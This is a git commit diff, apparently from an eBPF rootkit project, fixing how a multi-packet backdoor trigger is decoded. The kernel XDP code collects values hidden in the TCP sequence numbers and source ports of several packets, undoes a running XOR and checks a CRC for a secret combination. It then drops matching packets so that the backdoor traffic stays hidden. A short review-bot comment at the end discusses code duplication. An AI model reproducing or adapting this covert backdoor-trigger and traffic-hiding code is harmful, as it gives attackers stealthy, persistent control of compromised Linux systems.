Fixed a bug where tcpport mode in the multi-packet backdoor did not work if a previous trigger using seqnum mode was made

h3xduck
2022-05-18 12:45:35 -04:00
parent 104f4c0355
commit 3e697dd4cf
5 changed files with 12711 additions and 12298 deletions





@@ -201,32 +201,33 @@ static __always_inline int manage_backdoor_trigger_v3_32(struct backdoor_packet_
//The following routine (not just the next check) is necessarily dirty in terms of programming,
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SEQ_NUM] = {0};
int p_index = 0;
if(first_packet == 0){
for(int ii=first_packet; ii<3; ii++){
for(int ii=first_packet; ii<3; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
}else if(first_packet == 1){
for(int ii=first_packet; ii<3; ii++){
for(int ii=first_packet; ii<3; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
}else if(first_packet == 2){
for(int ii=first_packet; ii<3; ii++){
for(int ii=first_packet; ii<3; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
}
}
@@ -321,71 +322,72 @@ static __always_inline int manage_backdoor_trigger_v3_16(struct backdoor_packet_
}else{
first_packet = 0;
}
bpf_printk("BACKDOOR 16: FP:%i, LR:%i\n", first_packet, last_received);
//The following routine is necessarily dirty in terms of programming,
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT] = {0};
int p_index = 0;
if(first_packet == 0){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 1){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 2){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 3){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 4){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}else if(first_packet == 5){
for(int ii=first_packet; ii<6; ii++){
for(int ii=first_packet; ii<6; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
for(int ii=0; ii<first_packet; ii++){
for(int ii=0; ii<first_packet; ii++, p_index++){
__u16 src_port = b_data.trigger_array[ii].src_port;
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
}
}
/*bpf_printk("Payload before XOR: ");
bpf_printk("Payload before XOR: ");
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
bpf_printk("%x", payload[ii]);
}
bpf_printk("\n");*/
bpf_printk("\n");
//Now that we have the possible complete stream, let's search for the secret backdoor combination in it
//First undo running XOR
@@ -394,11 +396,11 @@ static __always_inline int manage_backdoor_trigger_v3_16(struct backdoor_packet_
__builtin_memcpy(payload+ii, (char*)&(xor_res), 0x01);
}
/*bpf_printk("Payload after XOR: ");
bpf_printk("Payload after XOR: ");
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
bpf_printk("%x", payload[ii]);
}
bpf_printk("\n");*/
bpf_printk("\n");
//Now compute CRC
__u8 x;
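Review bot: Every branch of the `if(first_packet == …)` chain in the first hunk (L23–L62) and the second hunk (L72–L150) now has a byte-identical body, because the only thing that used to differ between branches, the `*ii` payload offset, was replaced by `*p_index`; without a comment the chain reads as accidental copy-paste. The existing comment only says the verifier dislikes MOD, which does not explain why the branches are repeated; if the chain exists so that the verifier sees a constant `first_packet`, and therefore constant loop bounds, inside each branch, state that, e.g. `//Branches are intentionally identical: each pins first_packet to a constant so the loop bounds are known to the verifier`. Separately, L151–157 and L163–169 re-enable the previously commented-out per-byte payload dumps, an unrelated change that the commit message does not mention. Both enclosing functions, manage_backdoor_trigger_v3_32 and manage_backdoor_trigger_v3_16, start before their hunks and continue past them.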


@@ -214,6 +214,7 @@ int xdp_receive(struct xdp_md *ctx){
//where for other purpose, we must still check it)
int ret = manage_backdoor_trigger_v3_32(b_new_data_32);
if(ret == 1){
//The packet was for the backdoor, better hide it
return XDP_DROP;
}
}
@@ -227,7 +228,6 @@ int xdp_receive(struct xdp_md *ctx){
bpf_map_update_elem(&backdoor_packet_log_32, &ipvalue, &b_new_data_32, BPF_ANY);
}
////16 bit 6-len streams
struct backdoor_packet_log_data_16 *b_data_16 = (struct backdoor_packet_log_data_16*) bpf_map_lookup_elem(&backdoor_packet_log_16, &ipvalue);
struct backdoor_packet_log_data_16 b_new_data_16 = {0};